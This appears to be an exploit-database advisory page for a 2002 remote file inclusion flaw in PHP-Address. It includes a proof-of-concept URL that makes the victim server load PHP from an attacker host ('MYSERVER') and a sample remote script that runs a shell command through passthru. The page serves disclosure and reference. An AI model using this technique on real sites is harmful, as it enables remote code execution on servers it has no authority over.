header-logo
Suggest Exploit
vendor:
PHP-Address
by:
SecurityFocus
8.8
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: PHP-Address
Affected Version From: 1
Affected Version To: 1.2
Patch Exists: YES
Related CWE: CVE-2002-1390
CPE: o:php:php_address
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

PHP-Address Remote File Inclusion Vulnerability

PHP-Address is vulnerable to a Remote File Inclusion vulnerability which allows an attacker to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to a victim.

Mitigation:

Upgrade to the latest version of PHP-Address.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5039/info

PHP-Address is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. 

http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is already there look at line 5 in global.php3)

Remote script located on MYSERVER:

------------x.php3------------
<?
passthru("/bin/ls /");
?>
-------------------------------

Outputs a directory listing.